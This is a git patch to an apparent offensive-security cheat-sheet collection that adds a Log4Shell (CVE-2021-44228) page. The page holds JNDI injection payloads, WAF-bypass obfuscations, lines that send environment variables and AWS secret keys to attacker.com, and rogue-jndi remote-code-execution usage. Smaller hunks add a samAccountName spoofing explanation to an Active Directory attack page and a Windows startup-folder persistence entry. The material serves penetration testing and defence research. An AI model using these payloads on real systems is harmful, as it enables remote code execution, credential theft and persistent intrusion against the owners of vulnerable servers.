From 0d6d6049ce03272d6e934247ab57263bc04ea625 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 16 Dec 2021 09:52:51 +0100 Subject: [PATCH] AD + Log4shell + Windows Startup --- CVE Exploits/Log4Shell.md | 105 ++++++++++++++++++ .../Active Directory Attack.md | 3 + .../Cobalt Strike - Cheatsheet.md | 3 +- .../Windows - Persistence.md | 8 ++ 4 files changed, 118 insertions(+), 1 deletion(-) create mode 100644 CVE Exploits/Log4Shell.md diff --git a/CVE Exploits/Log4Shell.md b/CVE Exploits/Log4Shell.md new file mode 100644 index 0000000..6ca8e89 --- /dev/null +++ b/CVE Exploits/Log4Shell.md @@ -0,0 +1,105 @@ +# CVE-2021-44228 Log4Shell + +> Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled + +## Summary + +* [Vulnerable code](#vulnerable-code) +* [Payloads](#payloads) +* [Scanning](#scanning) +* [WAF Bypass](#waf-bypass) +* [Exploitation](#exploitation) + * [Environment variables exfiltration](#environment-variables-exfiltration) + * [Remote Command Execution](#remote-command-execution) +* [References](#references) + +## Vulnerable code + +You can reproduce locally with: `docker run --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app` using [christophetd/log4shell-vulnerable-app](https://github.com/christophetd/log4shell-vulnerable-app) or [leonjza/log4jpwn]( +https://github.com/leonjza/log4jpwn) +```java +public String index(@RequestHeader("X-Api-Version") String apiVersion) { + logger.info("Received a request for API version " + apiVersion); + return "Hello, world!"; +} +``` + +## Payloads + +```bash +# Identify Java version and hostname +${jndi:ldap://${java:version}.domain/a} +${jndi:ldap://${env:JAVA_VERSION}.domain/a} +${jndi:ldap://${sys:java.version}.domain/a} +${jndi:ldap://${sys:java.vendor}.domain/a} +${jndi:ldap://${hostName}.domain/a} +${jndi:dns://${hostName}.domain} + +# More enumerations keywords and variables +java:os +docker:containerId +web:rootDir +bundle:config:db.password +``` + +## Scanning + +* [log4j-scan](https://github.com/fullhunt/log4j-scan) + ```powershell + usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing] + [--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST] + python3 log4j-scan.py -u http://127.0.0.1:8081 --run-all-test + python3 log4j-scan.py -u http://127.0.0.1:808 --waf-bypass + ``` +* [Nuclei Template](https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/master/cves/2021/CVE-2021-44228.yaml) + + +## WAF Bypass + +```powershell +${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/a} + +# using lower and upper +${${lower:jndi}:${lower:rmi}://127.0.0.1:1389/poc} +${j${loWer:Nd}i${uPper::}://127.0.0.1:1389/poc} +${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce} + +# using env to create the letter +${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//your.burpcollaborator.net/a} +${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} +``` + +## Exploitation + +### Environment variables exfiltration + +```powershell +${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/ + +# AWS Access Key +${jndi:ldap://${env:USER}.${env:USERNAME}.attacker.com:1389/${env:AWS_ACCESS_KEY_ID}/${env:AWS_SECRET_ACCESS_KEY} +``` + + +### Remote Command Execution + +* [rogue-jndi - @artsploit](https://github.com/artsploit/rogue-jndi) + ```ps1 + java -jar target/RogueJndi-1.1.jar --command "touch /tmp/toto" --hostname "192.168.1.21" + Mapping ldap://192.168.1.10:1389/ to artsploit.controllers.RemoteReference + Mapping ldap://192.168.1.10:1389/o=reference to artsploit.controllers.RemoteReference + Mapping ldap://192.168.1.10:1389/o=tomcat to artsploit.controllers.Tomcat + Mapping ldap://192.168.1.10:1389/o=groovy to artsploit.controllers.Groovy + Mapping ldap://192.168.1.10:1389/o=websphere1 to artsploit.controllers.WebSphere1 + Mapping ldap://192.168.1.10:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1 + Mapping ldap://192.168.1.10:1389/o=websphere2 to artsploit.controllers.WebSphere2 + Mapping ldap://192.168.1.10:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2 + ``` +* [JNDI-Exploit-Kit - @pimps](https://github.com/pimps/JNDI-Exploit-Kit) + + +## References + +* [Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package - December 12, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day/) +* [Log4Shell Update: Second log4j Vulnerability Published (CVE-2021-44228 + CVE-2021-45046) - December 14, 2021](https://www.lunasec.io/docs/blog/log4j-zero-day-update-on-cve-2021-45046/) +* [PSA: Log4Shell and the current state of JNDI injection - December 10, 2021](https://mbechler.github.io/2021/12/10/PSA_Log4Shell_JNDI_Injection/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index b7b5d36..c9644aa 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -39,6 +39,7 @@ - [Alternatives - modules](#alternatives---modules) - [Using Mimikatz DCSync](#using-mimikatz-dcsync) - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa) + - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat) - [Password spraying](#password-spraying) - [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing) - [Spray a pre-generated passwords list](#spray-a-pre-generated-passwords-list) @@ -675,6 +676,8 @@ Requirements: #### samAccountName spoofing +> During S4U2Self, the KDC will try to append a '\$' to the computer name specified in the TGT, if the computer name is not found. An attacker can create a new machine account with the sAMAccountName set to a domain controller's sAMAccountName - without the '\$'. For instance, suppose there is a domain controller with a sAMAccountName set to 'DC\$'. An attacker would then create a machine account with the sAMAccountName set to 'DC'. The attacker can then request a TGT for the newly created machine account. After the TGT has been issued by the KDC, the attacker can rename the newly created machine account to something different, e.g. JOHNS-PC. The attacker can then perform S4U2Self and request a TGS to itself as any user. Since the machine account with the sAMAccountName set to 'DC' has been renamed, the KDC will try to find the machine account by appending a '$', which will then match the domain controller. The KDC will then issue a valid TGS for the domain controller. + **Requirements** * MachineAccountQuota > 0 diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md index de13806..c0f374e 100644 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md +++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md @@ -500,4 +500,5 @@ beacon> PortBender redirect 445 8445 * [TALES OF A RED TEAMER: HOW TO SETUP A C2 INFRASTRUCTURE FOR COBALT STRIKE – UB 2018 - NOV 25 2018](https://holdmybeersecurity.com/2018/11/25/tales-of-a-red-teamer-how-to-setup-a-c2-infrastructure-for-cobalt-strike-ub-2018/) * [Cobalt Strike - DNS Beacon](https://www.cobaltstrike.com/help-dns-beacon) * [How to Write Malleable C2 Profiles for Cobalt Strike - January 24, 2017](https://bluescreenofjeff.com/2017-01-24-how-to-write-malleable-c2-profiles-for-cobalt-strike/) -* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) \ No newline at end of file +* [NTLM Relaying via Cobalt Strike - July 29, 2021 - Rasta Mouse](https://rastamouse.me/ntlm-relaying-via-cobalt-strike/) +* [Cobalt Strike - User Guide](https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/welcome_main.htm) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index b17d638..39847c0 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -18,6 +18,7 @@ * [Registry HKLM](#registry-hklm) * [Winlogon Helper DLL](#) * [GlobalFlag](#) + * [Startup Elevated](#startup-elevated) * [Services Elevated](#services-elevated) * [Scheduled Tasks Elevated](#scheduled-tasks-elevated) * [Binary Replacement](#binary-replacement) @@ -235,6 +236,13 @@ reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\not reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe" ``` +### Startup Elevated + +Create a batch script in the user startup folder. + +```powershell +C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp +``` ### Services Elevated